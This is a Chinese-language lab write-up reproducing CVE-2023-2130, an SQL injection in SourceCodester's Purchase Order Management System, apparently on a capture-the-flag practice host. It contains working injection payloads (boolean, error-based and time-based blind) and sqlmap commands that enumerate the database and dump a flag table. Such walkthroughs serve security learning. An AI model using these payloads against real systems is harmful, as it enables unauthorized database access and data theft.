网站建设管理与维护软文新闻发布平台
目录标题
- 漏洞介绍
- EXP
- 漏洞复现
漏洞介绍
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
影响版本
SourceCodester采购订单管理系统1.0
EXP
sqlmap
Parameter: id (GET)Type: boolean-based blind #布尔盲注Title: AND boolean-based blind - WHERE or HAVING clausePayload: id=1' AND 8712=8712 AND 'qmcT'='qmcTType: error-based #报错注入Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)Payload: id=1' OR (SELECT 1285 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(1285=1285,1))),0x716a6b7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'OHDM'='OHDM#floor():利用 GROUP BY 分组时的随机数冲突,触发错误Type: time-based blind #时间盲注Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: id=1' AND (SELECT 4238 FROM (SELECT(SLEEP(5)))KfhW) AND 'apvD'='apvD
漏洞复现
一个登录框
抓包登录,回显有内容
存在sql查询语句
查找users表下username=admin,且password=132456的md5值的结果
{"status":"incorrect","last_qry":"SELECT * from users where username = 'admin' and password = md5('132456') "}
访问该路径
http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php
跟上id参数后出现回显,调用了数据库信息
简单测了一下,单引号存在注入,**–+**可以注释
使用sqlmap去跑,跑数据库
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] purchase_order_db
爆数据表
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db --tables
+---------------+
| fllllaaaag |
| item_list |
| order_items |
| po_list |
| supplier_list |
| system_info |
| users |
+---------------+
爆fllllaaaag表下的数据
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --dump
或者爆fllllaaaag表下的列
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag --columns
+--------+---------+
| Column | Type |
+--------+---------+
| flag | text |
| id | int(20) |
+--------+---------+
然后再爆破具体的内容
┌──(track㉿kali)-[~/CVE/CVE-2023-2130]
└─$ sqlmap -u "http://eci-2zecm12uicdsdye54d6n.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1" -D purchase_order_db -T fllllaaaag -C flag --dump
flag
flag{ae8dbccb-c588-434a-9da6-e4fd3e9d8f1d}